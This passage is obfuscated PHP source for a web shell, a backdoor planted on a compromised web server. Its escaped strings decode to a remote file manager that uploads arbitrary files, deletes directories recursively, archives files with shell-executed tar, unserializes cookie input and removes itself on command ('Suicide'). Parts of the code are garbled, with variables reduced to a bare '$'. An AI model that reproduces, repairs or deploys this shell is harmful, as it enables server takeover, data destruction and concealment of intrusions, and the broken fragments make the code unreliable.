"\105\116\x43\x54\131\120\105\x3d\x27\155\x75\154\164\x69\x70\141\162\164\57\x66\157\x72\155\55\144\x61\x74\x61\x27\76\xa\x9\11\x3c\x69\156\160\165\x74\40\x74\171\x70\x65\x3d\x68\151\x64\x64\145\x6e\x20\156\x61\155\x65\75\x61\x20\166\141\154\x75\145\75\47\106\151\x6c\145\x73\x4d\x61\156\47\76\12\x9\11\x3c\151\156\160\165\164\40\x74\x79\x70\x65\75\x68\x69\x64\x64\x65\x6e\40\156\141\155\145\75\143\x20\x76\141\154\x75\x65\75\x27" . htmlspecialchars($GLOBALS["\143\x77\144"]) . "\47\x3e\xa\x9\11\x3c\151\x6e\160\x75\x74\40\x74\x79\x70\x65\x3d\x68\151\x64\144\145\x6e\x20\156\x61\x6d\145\x3d\160\x31\40\x76\141\x6c\165\x65\x3d\47\165\x70\x6c\157\141\144\106\151\x6c\x65\47\76\12\11\x9\74\x69\156\160\165\x74\40\164\x79\x70\x65\75\x68\x69\x64\x64\145\x6e\x20\x6e\x61\155\145\75\x6e\145\x20\166\x61\x6c\165\145\x3d\x27\47\x3e\xa\11\x9\x3c\151\x6e\x70\165\x74\40\x74\171\x70\x65\x3d\x68\x69\x64\144\x65\x6e\40\156\141\155\x65\75\143\150\x61\162\163\x65\164\40\x76\141\x6c\165\x65\75\x27" . (isset($_POST["\x63\150\x61\162\x73\x65\164"]) ? $_POST["\143\x68\x61\x72\x73\145\164"] : '') . "\47\76\12\11\11\74\x73\160\141\x6e\x3e\125\160\x6c\x6f\141\x64\40\x66\x69\154\145\72\x3c\57\163\160\x61\156\x3e{$is_writable}\74\142\x72\76\x3c\151\156\x70\x75\164\x20\x63\154\141\163\x73\x3d\47\x74\157\x6f\154\163\x49\x6e\x70\47\40\164\171\x70\145\x3d\x66\151\154\145\x20\x6e\141\x6d\x65\75\146\133\x5d\x20\40\155\x75\x6c\164\x69\x70\154\x65\x3e\x3c\151\156\x70\x75\x74\40\164\171\160\145\75\163\165\142\155\x69\164\x20\x76\141\x6c\165\145\x3d\47\163\x75\142\155\x69\x74\x27\x3e\x3c\57\x66\157\x72\155\x3e\x3c\x62\162\40\x20\76\74\57\x74\144\76\xa\11\74\x2f\164\162\76\x3c\x2f\164\141\x62\x6c\145\76\x3c\57\144\151\166\76\12\11\74\x21\x2d\55\40\160\141\162\164\x69\x63\x6c\x65\x73\x20\x2d\x2d\x3e\40\74\x64\x69\166\40\x69\144\x3d\47\160\141\162\x74\151\143\154\145\x73\55\152\x73\x27\x3e\x3c\x2f\x64\x69\166\x3e\x3c\x73\x63\162\151\x70\164\x20\x73\x72\143\x3d\x27\x68\164\164\160\x3a\x2f\57\x63\x64\156\56\152\x73\144\x65\154\151\166\162\x2e\x6e\x65\164\57\x70\141\x72\x74\151\x63\154\145\163\x2e\x6a\x73\57\62\x2e\x30\56\x30\x2f\160\x61\x72\164\151\x63\154\145\x73\56\155\x69\156\56\x6a\163\47\x3e\74\57\x73\x63\162\151\x70\164\x3e\12\x9\74\x73\x63\x72\151\160\x74\x3e\160\141\x72\x74\x69\x63\154\145\x73\112\x53\x28\47\x70\141\x72\164\x69\143\x6c\x65\x73\x2d\x6a\x73\47\54\40\x7b\x27\x70\141\x72\x74\151\x63\x6c\145\163\47\72\x7b\x27\x6e\x75\x6d\142\145\162\x27\72\173\x27\x76\141\154\x75\x65\x27\x3a\70\60\x2c\47\x64\145\x6e\163\151\164\x79\x27\72\173\47\145\x6e\141\x62\154\x65\x27\x3a\164\x72\165\145\54\47\x76\x61\154\165\x65\x5f\141\x72\145\x61\x27\72\x38\x30\60\175\175\54\47\x63\157\x6c\x6f\x72\x27\x3a\173\x27\166\x61\x6c\165\145\x27\72\47\x23\146\x66\146\146\146\146\47\x7d\x2c\x27\163\150\x61\x70\145\47\x3a\x7b\47\164\x79\160\145\47\x3a\47\x74\162\x69\x61\x6e\x67\x6c\x65\x27\x2c\x27\x73\x74\x72\157\x6b\145\47\72\x7b\47\167\151\x64\164\x68\x27\x3a\60\54\x27\x63\x6f\x6c\x6f\162\x27\72\x27\x23\60\60\x30\x30\x30\x30\x27\175\54\x27\160\x6f\x6c\x79\x67\157\x6e\47\72\173\47\x6e\x62\137\163\x69\x64\145\x73\x27\x3a\65\x7d\x2c\x27\x69\155\x61\147\x65\x27\x3a\173\x27\x73\x72\143\47\72\47\151\x6d\147\x2f\x67\151\x74\x68\165\x62\56\x73\x76\x67\x27\x2c\47\167\151\144\164\150\x27\72\61\60\60\x2c\47\150\x65\151\x67\150\x74\x27\72\x31\x30\60\175\175\x2c\47\157\160\141\143\151\x74\171\x27\72\173\47\x76\141\x6c\165\145\x27\x3a\60\x2e\65\x2c\47\x72\x61\x6e\144\157\x6d\47\72\x74\162\165\x65\x2c\47\141\x6e\151\155\x27\72\173\x27\x65\156\x61\x62\154\145\x27\72\146\141\x6c\x73\145\54\47\x73\160\145\145\x64\x27\x3a\x31\x2c\47\x6f\x70\x61\x63\x69\164\171\x5f\155\x69\x6e\47\72\x30\56\x31\x2c\47\x73\171\156\143\x27\72\146\141\x6c\x73\x65\x7d\x7d\54\x27\x73\x69\x7a\145\47\72\173\47\166\x61\154\165\x65\x27\x3a\63\x2c\x27\162\141\x6e\x64\157\155\x27\x3a\x74\x72\165\145\54\47\141\156\151\155\47\x3a\173\47\x65\156\141\x62\x6c\x65\47\72\146\x61\x6c\x73\145\x2c\x27\163\x70\x65\145\x64\x27\72\x34\x30\54\x27\163\x69\x7a\x65\137\155\x69\156\x27\72\x30\x2e\x31\54\47\x73\x79\156\143\x27\72\x66\x61\x6c\163\x65\x7d\x7d\x2c\47\x6c\x69\156\145\137\x6c\x69\156\x6b\145\x64\47\72\173\x27\145\156\x61\x62\154\145\x27\x3a\164\x72\x75\145\x2c\47\144\x69\163\x74\x61\156\143\145\47\72\62\x30\x30\x2c\47\x63\157\x6c\157\162\47\72\x27\x23\x66\x66\x66\x66\146\x66\47\54\x27\157\x70\x61\x63\151\164\x79\x27\x3a\60\56\64\x2c\47\x77\151\144\x74\x68\47\x3a\61\175\x2c\47\x6d\157\x76\145\47\72\173\47\x65\x6e\x61\x62\154\x65\47\72\164\162\x75\145\54\47\x73\x70\145\x65\144\47\72\x31\x2c\47\144\x69\x72\x65\143\164\151\x6f\156\47\72\x27\156\157\156\x65\x27\54\47\162\141\x6e\x64\157\155\x27\72\x74\162\165\x65\x2c\x27\163\164\162\x61\x69\147\150\164\47\x3a\x66\141\x6c\x73\145\54\47\157\165\164\x5f\x6d\x6f\144\x65\x27\72\x27\157\x75\164\47\x2c\47\x62\157\x75\156\143\x65\x27\72\146\x61\x6c\163\x65\x2c\47\x61\x74\164\x72\141\x63\x74\47\72\173\x27\x65\156\141\142\x6c\145\x27\72\x66\x61\x6c\x73\x65\54\47\162\x6f\x74\x61\x74\x65\130\47\x3a\61\x30\x30\x30\x30\x2c\x27\x72\x6f\164\x61\x74\x65\x59\x27\72\x31\x30\x30\60\60\x7d\x7d\175\x2c\x27\x69\156\x74\x65\162\141\143\164\x69\x76\x69\164\171\x27\x3a\173\47\x64\x65\x74\145\x63\164\137\157\x6e\47\72\47\143\x61\156\x76\x61\x73\47\54\47\x65\166\145\x6e\x74\163\x27\72\x7b\47\157\x6e\x68\157\166\x65\162\x27\72\x7b\47\145\156\141\x62\154\145\x27\72\164\162\x75\145\x2c\47\155\157\x64\x65\47\x3a\x27\147\162\x61\x62\47\x7d\54\47\x6f\x6e\143\154\151\x63\x6b\47\x3a\173\x27\145\x6e\141\142\154\145\x27\x3a\164\x72\165\145\x2c\47\x6d\x6f\x64\145\47\x3a\47\x72\145\160\x75\154\x73\x65\x27\x7d\54\47\x72\145\x73\x69\172\145\47\x3a\x74\x72\x75\x65\x7d\x2c\47\155\157\x64\x65\x73\47\72\173\47\x67\162\x61\142\x27\72\173\x27\144\x69\163\164\x61\156\143\145\47\72\x32\60\60\x2c\x27\x6c\151\156\x65\x5f\154\151\156\153\145\x64\47\72\x7b\47\x6f\160\x61\x63\x69\164\x79\47\72\x30\56\65\175\175\x2c\x27\142\165\142\142\x6c\x65\x27\72\x7b\x27\x70\141\162\x74\151\143\x6c\145\163\x5f\x6e\142\x27\x3a\x32\x7d\x7d\175\54\47\162\x65\x74\x69\156\141\x5f\x64\145\164\x65\x63\x74\x27\72\164\162\165\x65\x7d\x29\73\x3c\x2f\x73\x63\x72\x69\160\x74\x3e\xa\11\x3c\57\142\x6f\144\171\x3e\x3c\x2f\x68\x74\155\x6c\x3e"; } goto DJcUw; nbMDY: function formatSizeUnits($bytes) { if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . "\x20\x47\x42"; } elseif ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . "\40\115\102"; } elseif ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . "\40\113\x42"; } elseif ($bytes > 1) { $bytes = $bytes . "\40\142\x79\x74\x65\x73"; } elseif ($bytes == 1) { $bytes = $bytes . "\x20\142\171\164\145"; } else { $bytes = "\60\40\x62\171\x74\145\x73"; } return $bytes; } goto XXrTo; O8Bkq: function actionSelfRemove() { if ($_POST["\x70\61"] == "\x79\145\x73") { if (@unlink(preg_replace("\41\x5c\50\x5c\144\x2b\x5c\x29\x5c\163\x2e\x2a\41", '', __FILE__))) { die("\x53\150\145\154\154\40\x68\141\x73\40\x62\145\x65\156\40\x72\x65\x6d\x6f\166\145\144"); } else { echo "\x75\156\154\151\156\153\x20\145\162\x72\157\162\x21"; } } if ($_POST["\x70\61"] != "\171\145\163") { hardHeader(); } echo "\74\x68\x31\x3e\x53\165\x69\143\x69\144\x65\74\x2f\x68\61\76\74\144\x69\166\x20\143\154\x61\163\x73\x3d\x63\x6f\156\x74\x65\x6e\164\76\122\145\141\x6c\154\x79\40\x77\x61\156\x74\40\x74\157\40\162\145\155\x6f\x76\x65\40\x74\x68\145\x20\163\x68\145\x6c\154\x3f\74\x62\x72\x3e\x3c\141\x20\x68\162\145\146\x3d\x23\x20\x6f\156\143\x6c\x69\143\153\75\42\147\50\156\165\x6c\154\x2c\x6e\x75\154\x6c\x2c\x27\171\145\x73\47\51\x22\x3e\131\x65\x73\x3c\57\141\x3e\x3c\x2f\x64\x69\x76\x3e"; hardFooter(); } goto u4WS6; KOaKG: function actionFilesMan() { if (!empty($_COOKIE["\x66"])) { $_COOKIE["\x66"] = @unserialize($_COOKIE["\x66"]); } if (!empty($_POST["\160\x31"])) { switch ($_POST["\160\x31"]) { case "\x75\160\154\157\141\144\106\151\x6c\145": if (is_array($_FILES["\146"]["\x74\x6d\160\x5f\x6e\141\x6d\x65"])) { foreach ($_FILES["\146"]["\164\155\x70\x5f\156\x61\x6d\145"] as $i => $tmpName) { if (!@move_uploaded_file($tmpName, $_FILES["\x66"]["\x6e\141\155\x65"][$i])) { echo "\103\x61\x6e\x27\164\x20\x75\x70\154\x6f\x61\x64\40\x66\151\x6c\x65\41"; } } } break; case "\x6d\x6b\x64\151\162": if (!@mkdir($_POST["\160\x32"])) { echo "\103\x61\x6e\x27\164\x20\143\x72\145\x61\164\145\x20\156\145\x77\x20\x64\151\162"; } break; case "\x64\x65\x6c\x65\x74\x65": function deleteDir($path) { $path = substr($path, -1) == "\x2f" ? $path : $path . "\57"; $dh = opendir($path); while (($ = readdir($dh)) !== false) { $ = $path . $; if (basename($) == "\56\56" || basename($) == "\56") { continue; } $type = filetype($); if ($type == "\144\151\162") { deleteDir($); } else { @unlink($); } } closedir($dh); @rmdir($path); } if (is_array(@$_POST["\x66"])) { foreach ($_POST["\x66"] as $f) { if ($f == "\56\x2e") { continue; } $f = urldecode($f); if (is_dir($f)) { deleteDir($f); } else { @unlink($f); } } } break; case "\x70\141\163\x74\x65": if ($_COOKIE["\141\x63\164"] == "\x63\157\160\x79") { function copy_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "\56" and $f != "\x2e\56") { copy_paste($c . $s . "\57", $f, $d . $s . "\57"); } } } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["\146"] as $f) { copy_paste($_COOKIE["\143"], $f, $GLOBALS["\x63\x77\144"]); } } elseif ($_COOKIE["\141\143\164"] == "\155\157\x76\x65") { function move_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "\x2e" and $f != "\56\x2e") { copy_paste($c . $s . "\x2f", $f, $d . $s . "\x2f"); } } } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["\x66"] as $f) { @rename($_COOKIE["\x63"] . $f, $GLOBALS["\143\x77\x64"] . $f); } } elseif ($_COOKIE["\x61\x63\x74"] == "\172\151\160") { if (class_exists("\x5a\x69\160\101\162\x63\x68\x69\166\145")) { $zip = new ZipArchive(); if ($zip->open($_POST["\x70\62"], 1)) { chdir($_COOKIE["\x63"]); foreach ($_COOKIE["\146"] as $f) { if ($f == "\x2e\x2e") { continue; } if (@is_file($_COOKIE["\x63"] . $f)) { $zip->addFile($_COOKIE["\x63"] . $f, $f); } elseif (@is_dir($_COOKIE["\143"] . $f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . "\57", FilesystemIterator::SKIP_DOTS)); foreach ($iterator as $key => $value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS["\143\x77\x64"]); $zip->close(); } } } elseif ($_COOKIE["\141\143\x74"] == "\x75\x6e\x7a\151\x70") { if (class_exists("\x5a\x69\x70\101\x72\x63\150\x69\x76\145")) { $zip = new ZipArchive(); foreach ($_COOKIE["\x66"] as $f) { if ($zip->open($_COOKIE["\143"] . $f)) { $zip->extractTo($GLOBALS["\143\x77\x64"]); $zip->close(); } } } } elseif ($_COOKIE["\141\x63\164"] == "\164\x61\162") { chdir($_COOKIE["\x63"]); $_COOKIE["\146"] = array_map("\145\x73\143\x61\x70\x65\x73\x68\x65\x6c\154\x61\x72\147", $_COOKIE["\146"]); ex("\164\x61\162\x20\143\x66\x7a\x76\x20" . escapeshellarg($_POST["\160\x32"]) . "\40" . implode("\40", $_COOKIE["\x66"])); chdir($GLOBALS["\x63\167\144"]); } unset($_COOKIE["\x66"]); setcookie("\146", '', time() - 3600); break; default: if (!empty($_POST["\160\x31"])) { prototype("\141\143\164", $_POST["\x70\61"]); prototype("\x66", serialize(@$_POST["\146"])); prototype("\143", @$_POST["\x63"]); } break; } } hardHeader(); echo "\x3c\x68\x31\76\x46\x69\x6c\145\40\x6d\141\x6e\141\147\145\x72\74\57\150\61\x3e\x3c\x64\151\166\x20\x63\154\141\x73\163\x3d\143\x6f\x6e\164\145\156\164\76\x3c\163\x63\162\151\x70\x74\76\x70\x31\137\75\160\62\137\75\x70\x33\137\75\x22\x22\x3b\x3c\x2f\x73\143\x72\x69\160\164\76"; $dirContent = hardScandir(isset($_POST["\143"]) ? $_POST["\143"] : $GLOBALS["\x63\167\x64"]); if ($dirContent === false) { echo "\x43\x61\156\47\164\x20\157\x70\x65\x6e\x20\x74\x68\151\x73\x20\146\157\154\x64\x65\x72\x21"; hardFooter(); return; } global $sort; $sort = array("\156\x61\155\x65", 1); if (!empty($_POST["\x70\61"])) { if (preg_match("\41\163\x5f\x28\x5b\101\55\x7a\x5d\x2b\x29\137\50\134\144\173\61\175\x29\41", $_POST["\160\x31"], $match)) { $sort = array($match[1], (int) $match[2]); } } echo "\74\x73\143\162\151\x70\164\x3e\12\11\146\165\156\x63\x74\x69\x6f\156\40\163\141\x28\51\40\173\12\x9\11\x66\157\162\x28\151\x3d\60\x3b\x69\x3c\144\56\146\151\154\145\163\56\145\154\145\155\x65\156\x74\163\56\154\145\156\x67\164\x68\73\x69\53\x2b\x29\12\x9\11\11\x69\146\50\x64\x2e\146\x69\154\x65\x73\56\145\154\x65\x6d\x65\156\164\x73\x5b\x69\x5d\56\x74\171\160\145\40\75\x3d\x20\47\x63\150\x65\143\153\x62\157\170\47\x29\xa\x9\11\11\11\x64\56\146\151\x6c\x65\163\x2e\145\154\x65\x6d\x65\156\x74\x73\x5b\151\135\x2e\143\x68\x65\143\153\145\x64\x20\75\x20\144\x2e\x66\151\154\x65\163\56\145\154\145\155\x65\x6e\164\x73\x5b\60\x5d\x2e\x63\x68\145\143\153\x65\144\73\12\11\175\12\74\x2f\163\x63\x72\x69\x70\x74\x3e\12\x3c\x74\141\142\x6c\x65\x20\x77\x69\x64\164\150\x3d\x27\61\x30\60\x25\47\x20\143\154\141\x73\163\75\x27\155\141\x69\x6e\x27\40\x63\x65\x6c\154\163\160\x61\143\x69\x6e\x67\75\x27\60\x27\x20\x63\145\x6c\x6c\160\141\144\144\151\156\x67\75\x27\x32\47\76\xa\x3c\x66\157\162\x6d\40\156\x61\155\145\75\146\151\x6c\x65\163\x20\x6d\x65\164\150\x6f\144\75\x70\157\163\164\76\74\164\162\x3e\x3c\x74\x68\40\x77\151\x64\164\150\75\x27\x31\x33\160\x78\47\x3e\74\x69\x6e\x70\x75\x74\40\x74\171\160\145\x3d\143\x68\x65\x63\153\142\157\x78\x20\157\x6e\143\x6c\151\x63\x6b\75\47\163\141\x28\x29\x27\x20\x63\154\141\163\163\x3d\x63\x68\x6b\x62\170\76\74\x2f\164\150\76\74\x74\x68\x3e\x3c\141\x20\150\162\x65\x66\x3d\x27\x23\x27\40\x6f\x6e\x63\x6c\x69\x63\x6b\x3d\47\147\x28\42\x46\151\x6c\x65\163\x4d\141\156\x22\54\x6e\165\154\154\x2c\x22\163\x5f\156\x61\155\x65\x5f" . ($sort[1] ? 0 : 1) . "\42\51\x27\x3e\x4e\141\155\145\x3c\57\141\x3e\x3c\57\164\x68\76\74\x74\x68\x3e\74\x61\40\x68\162\145\x66\75\x27\x23\x27\x20\157\156\143\x6c\151\143\153\x3d\47\147\50\42\x46\151\154\x65\x73\115\x61\156\42\54\x6e\165\x6c\154\x2c\42\163\137\163\x69\172\x65\x5f" . ($sort[1] ? 0 : 1) . "\42\x29\x27\x3e\x53\151\172\x65\74\x2f\x61\x3e\x3c\x2f\164\150\76\74\164\x68\x3e\x3c\x61\x20\150\x72\x65\146\x3d\x27\x23\47\40\157\156\143\x6c\x69\143\153\x3d\47\147\x28\x22\x46\x69\x6c\145\x73\x4d\141\156\42\54\156\165\x6c\154\54\x22\x73\x5f\x6d\x6f\x64\151\x66\x79\137" . ($sort[1] ? 0 : 1) . "\x22\x29\47\76\x4d\x6f\x64\151\146\171\x3c\57\x61\x3e\74\x2f\x74\x68\x3e\74\x74\150\76\117\167\156\x65\162\x2f\x47\162\x6f\165\x70\x3c\x2f\x74\150\x3e\74\164\x68\76\74\x61\40\150\x72\x65\146\x3d\x27\43\47\x20\157\x6e\143\154\x69\x63\x6b\75\47\x67\50\42\106\x69\154\145\x73\x4d\141\156\x22\54\x6e\x75\x6c\x6c\x2c\x22\163\137\160\145\162\x6d\x73\x5f" . ($sort[1] ? 0 : 1) . "\x22\x29\47\x3e\120\145\162\155\151\x73\x73\x69\157\x6e\x73\74\x2f\x61\x3e\74\57\x74\150\76\74\164\150\x3e\x41\143\164\x69\157\x6e\163\74\x2f\164\150\x3e\x3c\x2f\x74\162\76"; $dirs = $files = array(); $n = count($dirContent); for ($i = 0; $i < $n; $i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array("\x6e\x61\155\x65" => $dirContent[$i], "\160\141\x74\x68" => $GLOBALS["\x63\x77\x64"] . $dirContent[$i], "\x6d\157\x64\151\x66\171" => date("\x59\55\x6d\x2d\144\40\x48\72\x69\72\x73", @filemtime($GLOBALS["\143\167\144"] . $dirContent[$i])), "\160\145\x72\x6d\163" => viewPermsColor($GLOBALS["\143\167\144"] . $dirContent[$i]), "\x73\x69\172\x65" => @filesize($GLOBALS["\143\167\144"] . $dirContent[$i]), "\x6f\167\x6e\x65\x72" => $ow["\156\141\x6d\x65"] ? $ow["\x6e\x61\155\x65"] : @fileowner($dirContent[$i]), "\x67\162\157\x75\160" => $gr["\x6e\141\155\145"] ? $gr["\156\141\x6d\145"] : @filegroup($dirContent[$i])); if (@is_file($GLOBALS["\x63\x77\144"] . $dirContent[$i])) { $files[] = array_merge($tmp, array("\164\x79\x70\x65" => "\146\x69\154\x65")); } elseif (@is_link($GLOBALS["\143\167\144"] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array("\x74\171\160\145" => "\154\x69\x6e\x6b", "\x6c\151\x6e\153" => readlink($tmp["\160\x61\164\x68"]))); } elseif (@is_dir($GLOBALS["\x63\167\144"] . $dirContent[$i]) && $dirContent[$i] != "\x2e") { $dirs[] = array_merge($tmp, array("\x74\171\160\x65" => "\x64\151\162")); } } $GLOBALS["\163\157\162\164"] = $sort; function cmp($a, $b) { if ($GLOBALS["\163\157\162\164"][0] != "\163\x69\172\145") { return strcmp(strtolower($a[$GLOBALS["\x73\157\162\x74"][0]]), strtolower($b[$GLOBALS["\163\157\162\164"][0]])) * ($GLOBALS["\x73\x6f\162\164"][1] ? 1 : -1); } else { return ($a["\x73\x69\x7a\145"] < $b["\163\x69\x7a\145"] ? -1 : 1) * ($GLOBALS["\163\157\162\x74"][1] ? 1 : -1); } } usort($files, "\143\x6d\160"); usort($dirs, "\143\x6d\160"); $files = array_merge($dirs, $files); $l = 0; foreach ($files as $f) { echo "\74\x74\162" . ($l ? "\40\x63\154\141\x73\163\x3d\154\x31" : '') . "\x3e\x3c\164\144\76\74\x69\x6e\x70\x75\x74\x20\x74\x79\160\x65\x3d\143\x68\x65\x63\x6b\x62\157\x78\x20\156\x61\155\145\75\x22\146\x5b\135\x22\x20\166\141\154\x75\x65\75\x22" . urlencode($f["\x6e\x61\x6d\145"]) . "\42\x20\x63\x6c\141\x73\x73\75\143\x68\x6b\142\x78\x3e\x3c\57\164\x64\76\74\164\x64\x3e\x3c\141\x20\x68\162\x65\146\x3d\43\x20\x6f\x6e\x63\154\x69\x63\153\x3d\x22" . ($f["\x74\x79\x70\145"] == "\146\151\x6c\145" ? "\x67\x28\x27\x46\151\154\x65\x73\124\x6f\157\154\x73\47\54\x6e\x75\x6c\154\54\47" . urlencode($f["\156\x61\x6d\145"]) . "\x27\x2c\x20\47\166\x69\x65\x77\47\x29\x22\x3e" . htmlspecialchars($f["\x6e\141\155\145"]) : "\147\x28\x27\106\x69\x6c\145\163\115\x61\x6e\47\x2c\x27" . $f["\x70\x61\164\150"] . "\47\51\x3b\x22\40" . (empty($f["\x6c\x69\x6e\153"]) ? '' : "\164\x69\x74\x6c\x65\x3d\47{$f["\154\x69\x6e\x6b"]}\47") . "\76\x3c\x62\76\x5b\x20" . htmlspecialchars($f["\x6e\x61\x6d\x65"]) . "\40\x5d\x3c\x2f\x62\x3e") . "\x3c\x2f\141\x3e\x3c\57\x74\x64\x3e\x3c\x74\144\76" . ($f["\164\171\160\x65"] == "\146\x69\154\x65" ? viewSize($f["\x73\x69\x7a\145"]) : $f["\x74\171\160\x65"]) . "\x3c\57\164\x64\x3e\x3c\164\144\76" . $f["\155\157\x64\x69\x66\171"] . "\74\x2f\164\x64\76\74\x74\144\x3e" . $f["\x6f\167\x6e\x65\162"] . "\57" . $f["\147\x72\157\165\x70"] . "\x3c\57\164\144\76\74\164\x64\76\74\x61\x20\150\x72\145\146\x3d\x23\x20\x6f\156\143\x6c\151\143\x6b\75\42\x67\50\x27\x46\x69\x6c\145\163\124\x6f\x6f\x6c\163\47\54\156\165\154\x6c\54\x27" . urlencode($f["\156\x61\x6d\145"]) . "\x27\54\47\143\150\155\x6f\144\x27\51\x22\x3e" . $f["\x70\x65\x72\x6d\163"] . "\74\x2f\x74\x64\76\74\164\144\76\74\x61\40\x63\154\141\163\163\x3d\x22\x74\157\157\154\164\151\x70\42\40\x64\141\x74\141\55\164\157\x6f\154\164\151\160\75\42\x52\x65\156\x61\155\145\x22\x20\150\x72\145\x66\75\x22\43\x22\40\x6f\x6e\143\154\x69\143\x6b\75\x22\147\50\x27\x46\151\154\145\163\124\x6f\x6f\154\163\x27\54\156\165\x6c\154\54\47" . urlencode($f["\x6e\141\x6d\145"]) . "\x27\x2c\40\x27\162\145\156\141\155\145\47\x29\42\x3e\x52\74\x2f\x61\76\x20\74\141\x20\x63\x6c\141\x73\x73\x3d\42\x74\157\157\154\x74\x69\x70\x22\40\144\x61\164\x61\55\x74\x6f\157\154\164\x69\x70\x3d\42\124\x6f\x75\x63\x68\42\40\150\x72\x65\146\x3d\x22\43\42\x20\157\156\143\x6c\151\x63\x6b\75\x22\147\50\47\106\151\x6c\x65\163\124\x6f\157\x6c\163\x27\x2c\156\165\154\x6c\x2c\x27" . urlencode($f["\156\x61\x6d\x65"]) . "\47\x2c\x20\47\x74\x6f\165\143\150\47\x29\42\x3e\124\74\57\141\x3e" . ($f["\164\171\x70\145"] == "\146\x69\154\145" ? "\40\74\141\40\143\x6c\141\163\x73\75\42\x74\x6f\157\154\164\151\x70\x22\40\144\141\164\141\55\164\157\x6f\154\x74\151\160\x3d\42\x46\162\x61\x6d\x65\42\40\150\162\x65\x66\x3d\x22\x23\x22\40\157\156\x63\x6c\x69\143\x6b\x3d\x22\x67\x28\x27\x46\x69\x6c\145\163\x54\157\x6f\154\x73\47\x2c\x6e\x75\x6c\x6c\x2c\x27" . urlencode($f["\x6e\141\x6d\145"]) . "\47\54\40\47\146\162\x61\x6d\x65\47\x29\42\76\106\x3c\x2f\141\x3e\x20\74\x61\x20\x63\x6c\141\x73\x73\75\42\164\157\x6f\x6c\x74\151\x70\x22\x20\x64\x61\x74\x61\55\164\157\157\x6c\164\151\160\75\x22\x45\x64\151\x74\x22\40\150\x72\x65\x66\x3d\42\43\x22\x20\157\156\x63\x6c\x69\x63\x6b\x3d\x22\x67\x28\x27\106\x69\154\x65\163\124\157\x6f\x6c\x73\x27\54\x6e\x75\x6c\154\54\47" . urlencode($f["\156\141\155\x65"]) . "\x27\54\40\47\145\x64\151\x74\47\x29\42\x3e\x45\x3c\57\x61\x3e\40\x3c\141\x20\x63\154\141\x73\x73\75\x22\x74\x6f\x6f\x6c\164\x69\160\42\40\x64\141\x74\x61\x2d\x74\x6f\157\x6c\x74\151\160\75\x22\104\x6f\x77\156\x6c\157\x61\x64\x22\x20\150\162\145\146\75\42\x23\x22\40\157\156\143\154\151\143\x6b\x3d\x22\147\x28\47\106\x69\x6c\145\163\124\157\x6f\x6c\x73\x27\x2c\156\165\x6c\x6c\x2c\x27" . urlencode($f["\x6e\x61\x6d\x65"]) . "\x27\x2c\40\47\144\x6f\x77\x6e\x6c\x6f\x61\144\47\x29\x22\76\x44\x3c\x2f\x61\76" : '') . "\x3c\57\x74\x64\x3e\74\x2f\x74\162\x3e"; $l = $l ? 0 : 1; } echo "\x3c\164\x72\40\151\144\x3d\146\x61\153\76\x3c\164\x64\x20\143\x6f\154\x73\x70\x61\x6e\x3d\x37\76\xa\x9\74\151\156\160\165\x74\40\164\171\160\x65\x3d\150\x69\144\144\145\156\x20\x6e\x61\155\145\x3d\x6e\145\x20\166\141\154\x75\145\75\47\x27\x3e\12\11\74\151\156\x70\x75\164\x20\x74\x79\160\x65\x3d\x68\151\x64\x64\145\156\40\x6e\x61\x6d\x65\x3d\x61\x20\166\x61\154\165\145\75\x27\106\151\154\145\x73\x4d\x61\156\x27\76\xa\11\x3c\151\156\x70\x75\x74\x20\x74\x79\x70\145\x3d\x68\x69\144\x64\145\156\40\156\x61\155\145\75\143\x20\x76\x61\x6c\165\x65\75\47" . htmlspecialchars($GLOBALS["\x63\x77\x64"]) . "\47\x3e\12\11\74\151\156\160\165\x74\x20\164\x79\160\145\x3d\150\151\144\x64\145\156\40\x6e\x61\x6d\145\75\x63\150\141\x72\163\x65\164\40\166\x61\x6c\x75\x65\x3d\47" . (isset($_POST["\143\150\141\x72\163\145\164"]) ? $_POST["\143\x68\x61\x72\x73\x65\164"] : '') . "\x27\x3e\xa\x9\74\154\x61\142\x65\x6c\76\x3c\163\145\x6c\x65\143\164\40\x6e\141\155\x65\75\x27\160\61\x27\x3e"; if (!empty($_COOKIE["\x61\143\164"]) && @count($_COOKIE["\x66"])) { echo "\74\x6f\160\164\x69\157\156\40\x76\141\x6c\165\145\75\x27\x70\x61\163\164\x65\x27\76\342\206\xb3\x20\x50\x61\163\164\145\74\x2f\x6f\160\164\151\x6f\156\76"; } echo "\74\x6f\x70\164\151\157\x6e\40\x76\x61\154\165\145\75\47\143\157\160\x79\47\x3e\103\157\x70\x79\x3c\x2f\157\x70\x74\x69\157\x6e\x3e\74\x6f\x70\x74\x69\x6f\156\40\x76\x61\x6c\x75\145\75\47\155\x6f\166\x65\x27\76\x4d\157\x76\145\74\x2f\x6f\160\164\x69\157\156\76\x3c\x6f\160\164\151\157\156\40\x76\x61\x6c\x75\145\75\47\144\145\x6c\145\x74\145\47\76\x44\x65\154\x65\164\145\x3c\57\157\x70\164\151\x6f\156\76"; if (class_exists("\x5a\151\160\x41\x72\x63\x68\x69\166\145")) { echo "\x3c\x6f\160\x74\x69\x6f\x6e\40\x76\141\x6c\x75\x65\75\x27\x7a\151\x70\x27\x3e\53\40\172\x69\160\74\x2f\157\160\x74\x69\x6f\156\x3e\74\x6f\160\x74\x69\157\x6e\x20\x76\x61\x6c\165\145\75\x27\x75\x6e\172\151\x70\x27\x3e\x2d\x20\172\x69\x70\74\57\x6f\x70\x74\151\x6f\x6e\76"; } echo "\x3c\x6f\160\164\151\157\156\x20\x76\x61\154\165\145\75\x27\164\x61\162\x27\76\53\40\x74\141\x72\x2e\147\172\74\57\x6f\160\164\x69\x6f\x6e\76"; echo 